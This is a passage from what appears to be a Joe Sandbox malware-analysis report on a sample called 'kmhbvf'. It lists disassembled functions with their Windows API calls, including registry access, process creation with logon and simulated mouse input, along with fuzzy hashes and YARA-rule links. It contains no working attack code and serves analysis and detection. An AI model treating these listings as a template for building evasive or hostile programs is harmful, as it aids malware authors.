Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00EFA1DB
Part of subcall function 00EF33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00EFA1EE

__mtinitlocks.LIBCMT ref: 00EF9D1B
__mtterm.LIBCMT ref: 00EF9D24

Part of subcall function 00EF9D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00EF9D29,00EF7EFD,00F8CD38,00000014), ref: 00EF9E86
Part of subcall function 00EF9D8C: _free.LIBCMT ref: 00EF9E8D
Part of subcall function 00EF9D8C: DeleteCriticalSection.KERNEL32(00F90C00,?,?,00EF9D29,00EF7EFD,00F8CD38,00000014), ref: 00EF9EAF

__calloc_crt.LIBCMT ref: 00EF9D49
__initptd.LIBCMT ref: 00EF9D6B
GetCurrentThreadId.KERNEL32 ref: 00EF9D72

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: ed783fad49e40966798ef6405c2db4baf7dcde7f16be8e5ea9246204a1e8d603
Instruction ID: 4f3f524ddccade50e1cb64bcc72f095cf4a5ea1e5c9552c3c2f36689a240c4e8
Opcode Fuzzy Hash: ed783fad49e40966798ef6405c2db4baf7dcde7f16be8e5ea9246204a1e8d603
Instruction Fuzzy Hash: 83F06D3260A72D6AE7347B747C0377A26D4DB81774F31261AF6E4F51D3EF1289014190

Uniqueness

Uniqueness Score: -1.00%

Function 00EF41B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00EF4282,?), ref: 00EF41D3
GetProcAddress.KERNEL32(00000000), ref: 00EF41DA
EncodePointer.KERNEL32(00000000), ref: 00EF41E6
DecodePointer.KERNEL32(00000001,00EF4282,?), ref: 00EF4203

Strings

combase.dll, xrefs: 00EF41CE
RoInitialize, xrefs: 00EF41C2

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 336e4d41d8e1bb94524ece9d18e0bb421a159d2641152125d3497664791ca94c
Instruction ID: 50238e829bcd0e4a940e91508c14c183722e54b87f47da2791cc9a08ab041988
Opcode Fuzzy Hash: 336e4d41d8e1bb94524ece9d18e0bb421a159d2641152125d3497664791ca94c
Instruction Fuzzy Hash: F2E01AB069070DAFEB111B70ED4DB1A3664AB11B0AF604426F511E51E0CFF54088BF00

Uniqueness

Uniqueness Score: -1.00%

Function 00EF428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EF41A8), ref: 00EF42A8
GetProcAddress.KERNEL32(00000000), ref: 00EF42AF
EncodePointer.KERNEL32(00000000), ref: 00EF42BA
DecodePointer.KERNEL32(00EF41A8), ref: 00EF42D5

Strings

combase.dll, xrefs: 00EF42A3
RoUninitialize, xrefs: 00EF4297

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 73eaca5575913ef8fe408b7704dbb994b841878146ad4b0e4b3c83fb48f906d6
Instruction ID: e145ea587955159b46d8667b528d1e6f82f69dc79523da20d6714441007e8d8c
Opcode Fuzzy Hash: 73eaca5575913ef8fe408b7704dbb994b841878146ad4b0e4b3c83fb48f906d6
Instruction Fuzzy Hash: 56E0B6B055071CABEB129F60AD0DB563AA4BB01B46F600126F115E51F0CFF48688FB15

Uniqueness

Uniqueness Score: -1.00%

Function 00ED218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00ED21B8
GetWindowRect.USER32 ref: 00ED21F9
ScreenToClient.USER32 ref: 00ED2221
GetClientRect.USER32(?,?), ref: 00ED2350
GetWindowRect.USER32 ref: 00ED2369

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 3179be26da650cb198569c5c4a03af53a6bcd602ae715f6371622d14159511a1
Instruction ID: 66a33e897cf166a1db550e82482667c0a7bd25d933765eb6ce953ededf472080
Opcode Fuzzy Hash: 3179be26da650cb198569c5c4a03af53a6bcd602ae715f6371622d14159511a1
Instruction Fuzzy Hash: CEB17D3990024ADBDF10CFA8C5807EEB7B1FF18710F14912AEE59AB354DB34A951EB64

Uniqueness

Uniqueness Score: -1.00%

Function 00F36A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F36BC6
_memmove.LIBCMT ref: 00F36B01

Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC

_memmove.LIBCMT ref: 00F36B74
_memmove.LIBCMT ref: 00F36C5B
_memmove.LIBCMT ref: 00F36C74
_memmove.LIBCMT ref: 00F36C90

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 93a6fe222215f152f2da7da047a9d34a8d19e8cc4c7108f3cd93bca79a4447a6
Instruction ID: a8e0a62e7fc4860edbd1d638950de92f02f6abfdddeeedb537c73ceb4889378c
Opcode Fuzzy Hash: 93a6fe222215f152f2da7da047a9d34a8d19e8cc4c7108f3cd93bca79a4447a6
Instruction Fuzzy Hash: 2361EE7150029EABCF01EF60CC82EFE37A9EF05318F049599F959AB292DB349C46DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F50844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

Part of subcall function 00F5147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5040D,?,?), ref: 00F51491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F5091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F5095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F50980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F509A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F509EC
RegCloseKey.ADVAPI32(00000000), ref: 00F509F9

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: d862686ffcdab6672d64d1749eb864683c48e500a90a83eec0ad754996280130
Instruction ID: 999257fa3c2bf2bcb2ca6e7d94b99490fe0a6a2696aa9cf9b8f9c158d3601d30
Opcode Fuzzy Hash: d862686ffcdab6672d64d1749eb864683c48e500a90a83eec0ad754996280130
Instruction Fuzzy Hash: 94519C31208244AFD714EF64C885E6FBBE9FF84310F10491DF995972A2DB31E909EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F55DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00F55E38
GetMenuItemCount.USER32 ref: 00F55E6F
GetMenuStringW.USER32 ref: 00F55E97
GetMenuItemID.USER32(?,?), ref: 00F55F06
GetSubMenu.USER32 ref: 00F55F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 00F55F65

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 747d07ab05bb0e11d0ccdc745f9c02dba1860a8febdb90ed2ab4017c8d6bec68
Instruction ID: 74fc118b7e2c632b9c86e4bc818eb9f7b3a9201cdbe81ea9b9c64fbc08812575
Opcode Fuzzy Hash: 747d07ab05bb0e11d0ccdc745f9c02dba1860a8febdb90ed2ab4017c8d6bec68
Instruction Fuzzy Hash: 2451BE36E00A19EFCB11EF64C851AAEB7F5EF48720F104059EE11BB391CB74AE419B90

Uniqueness

Uniqueness Score: -1.00%

Function 00F2F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F2F6A2
VariantClear.OLEAUT32(00000013), ref: 00F2F714
VariantClear.OLEAUT32(00000000), ref: 00F2F76F
_memmove.LIBCMT ref: 00F2F799
VariantClear.OLEAUT32(?), ref: 00F2F7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F2F814

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 51655ac226ae314ae99fc33921ea11c7976c9dd466d88db7bbda82565737a31a
Instruction ID: 80b6e26d1300e4c368e8ebc52591e520dc090b2f7c6e7fb59c005322d489a5bc
Opcode Fuzzy Hash: 51655ac226ae314ae99fc33921ea11c7976c9dd466d88db7bbda82565737a31a
Instruction Fuzzy Hash: 8B5168B5A10219EFCB14CF58D884AAAB7B8FF4C314B15856AE959DB300D734E915CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F329B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F329FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F32A4A
IsMenu.USER32 ref: 00F32A6A
CreatePopupMenu.USER32(00F97890,00000000,749133D0), ref: 00F32A9E
GetMenuItemCount.USER32 ref: 00F32AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F32B2D

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 4a9981143becaf9f0a71e60352924843c4e2b28995acaa237b325458339d6fae
Instruction ID: dce88218943eff187e8e881afb64d044066fb1080858c356b25cabe0634d3b3f
Opcode Fuzzy Hash: 4a9981143becaf9f0a71e60352924843c4e2b28995acaa237b325458339d6fae
Instruction Fuzzy Hash: 4751BF70A00309EFDF65CF68D888BAEFBF4AF84334F144159E8119B2A1DBB49944EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00ED1B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00ED1B76
GetWindowRect.USER32 ref: 00ED1BDA
ScreenToClient.USER32 ref: 00ED1BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00ED1C08
EndPaint.USER32(?,?), ref: 00ED1C52

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 6ca9f57db81f4e9fe96d5e60ff038eb72bf9ecbadbb3ce98da4840ceace9cb6c
Instruction ID: d9fba3e5d0af737a816e41ef606cc077165d786c2402b3108e907d8b45b68a56
Opcode Fuzzy Hash: 6ca9f57db81f4e9fe96d5e60ff038eb72bf9ecbadbb3ce98da4840ceace9cb6c
Instruction Fuzzy Hash: 9E41E470104305AFD710EF24CC88FBB7BE8EB85364F2405AAF9A5972A1C7719846EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F5BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00F977B0,00000000,012786F8,?,?,00F977B0,?,00F5BC1A,?,?), ref: 00F5BD84
EnableWindow.USER32(00000000,00000000), ref: 00F5BDA8
ShowWindow.USER32(00F977B0,00000000,012786F8,?,?,00F977B0,?,00F5BC1A,?,?), ref: 00F5BE08
ShowWindow.USER32(00000000,00000004,?,00F5BC1A,?,?), ref: 00F5BE1A
EnableWindow.USER32(00000000,00000001), ref: 00F5BE3E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F5BE61

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 4555a7c28c95501588e273dffa22771c4e97e55718c929d319f71b505cece069
Instruction ID: 1e5f67ff27a88913c5a9ccb28b051ef263c4affd81c211a44fa4450ac518c514
Opcode Fuzzy Hash: 4555a7c28c95501588e273dffa22771c4e97e55718c929d319f71b505cece069
Instruction Fuzzy Hash: 49415334A00545AFDB22CF14C48AB957BF1FF05326F1841A9EF588F2A2CB71A859EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F47788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00F4550C,?,?,00000000,00000001), ref: 00F47796

Part of subcall function 00F4406C: GetWindowRect.USER32 ref: 00F4407F

GetDesktopWindow.USER32 ref: 00F477C0
GetWindowRect.USER32 ref: 00F477C7
mouse_event.USER32 ref: 00F477F9

Part of subcall function 00F357FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F35877

GetCursorPos.USER32(?,?,?,?,?,?,00F4550C,?,?,00000000,00000001), ref: 00F47825
mouse_event.USER32 ref: 00F47883

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 487796da67e49cd161ce24da0bbaa2208ac3056c391ce455b7d844205817438c
Instruction ID: 1e8bc8c365f3c96648d6513bb24380106e09ff2d1b9ec21c29156f7861617d0c
Opcode Fuzzy Hash: 487796da67e49cd161ce24da0bbaa2208ac3056c391ce455b7d844205817438c
Instruction Fuzzy Hash: 6F31D272508309ABD720DF14CC49F9BBBA9FF88714F100919F995A7181CB75E908DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F29431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F28CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F28CDE
Part of subcall function 00F28CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F28CE8
Part of subcall function 00F28CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F28CF7
Part of subcall function 00F28CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F28CFE
Part of subcall function 00F28CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F28D14

GetLengthSid.ADVAPI32(?,00000000,00F2904D), ref: 00F29482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F2948E
HeapAlloc.KERNEL32(00000000), ref: 00F29495
CopySid.ADVAPI32(00000000,00000000,?), ref: 00F294AE
GetProcessHeap.KERNEL32(00000000,00000000,00F2904D), ref: 00F294C2
HeapFree.KERNEL32(00000000), ref: 00F294C9

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 9a5e837283aadadb0e449318fce869c216d20d6b62ac982fa56b2eba38ea1d9a
Instruction ID: 6d2b6b3c391deab98dd6cbf997d63b4701128dfa8dc7c7ac56e70988ecd9333e
Opcode Fuzzy Hash: 9a5e837283aadadb0e449318fce869c216d20d6b62ac982fa56b2eba38ea1d9a
Instruction Fuzzy Hash: C111B431905618FFDB10EFA4DC19BAF77A9FB45325F108119E85597210CBB59901EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F291CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F29200
OpenProcessToken.ADVAPI32(00000000), ref: 00F29207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F29216
CloseHandle.KERNEL32(00000004), ref: 00F29221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F29250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00F29264

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: d5137395493b446b8574237b53fe659c64355334eeb11f60328b175300013472
Instruction ID: ce41c577f78ab129bb86fd611e78fa34cbb04bd1a182b3db2f7dae551cbd683a
Opcode Fuzzy Hash: d5137395493b446b8574237b53fe659c64355334eeb11f60328b175300013472
Instruction Fuzzy Hash: DA11477250520EFBDB028F94ED49BDA7BA9EF08714F144024FA04A2160C7B29D60EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F2C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F2C34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 00F2C35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F2C366
ReleaseDC.USER32 ref: 00F2C36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F2C385
MulDiv.KERNEL32(000009EC,?,?), ref: 00F2C397

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 7ad9b09fd1bed00a29f303b84508c48cf1050e72151cd58e4dde04504ee991a5
Instruction ID: ded8d97cd406b048148c739810090837571d2b31427f0fe3e665ccd33ed450ff
Opcode Fuzzy Hash: 7ad9b09fd1bed00a29f303b84508c48cf1050e72151cd58e4dde04504ee991a5
Instruction Fuzzy Hash: 99014475E00319BBEF109BA59D49A5FBFB8EB48761F104065FA08A7290DAB19D10DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F5C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00ED16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00ED1729
Part of subcall function 00ED16CF: SelectObject.GDI32(?,00000000), ref: 00ED1738
Part of subcall function 00ED16CF: BeginPath.GDI32(?), ref: 00ED174F
Part of subcall function 00ED16CF: SelectObject.GDI32(?,00000000), ref: 00ED1778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F5C57C
LineTo.GDI32(00000000,00000003,?), ref: 00F5C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F5C59E
LineTo.GDI32(00000000,00000000,?), ref: 00F5C5AE
EndPath.GDI32(00000000), ref: 00F5C5BE
StrokePath.GDI32(00000000), ref: 00F5C5CE

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
